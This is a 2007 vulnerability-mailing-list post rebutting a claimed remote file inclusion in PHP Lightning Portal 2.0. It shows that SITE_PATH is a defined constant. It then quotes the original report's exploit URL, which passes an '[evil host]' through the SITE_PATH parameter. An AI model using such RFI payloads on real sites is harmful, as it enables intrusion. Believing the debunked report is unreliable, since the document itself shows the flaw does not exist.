[VIM] FALSE: PHP LIGHTNING PORTAL (PLP) v.2.0 Remote File Inclusion

str0ke str0ke at milw0rm.com
Fri Feb 2 12:04:01 EST 2007


define('SITE_PATH','/var/www/htdocs/'); //with trailing "/"

require SITE_PATH.'inc/lib.inc.php';

Enough said.

/str0ke

* Portal Name = PHP LIGHTNING PORTAL (PLP) v.2.0
* Class = Remote File Inclusion
* Risk = High
* Download = http://www.alarit.com/downloads/products/plp_2_0_demo.zip
**********************************************************************************
- Exploit:
http://www.site.com/[script path]/inc/application.php?SITE_PATH=[evil host]
***********************************************************************************


More information about the VIM mailing list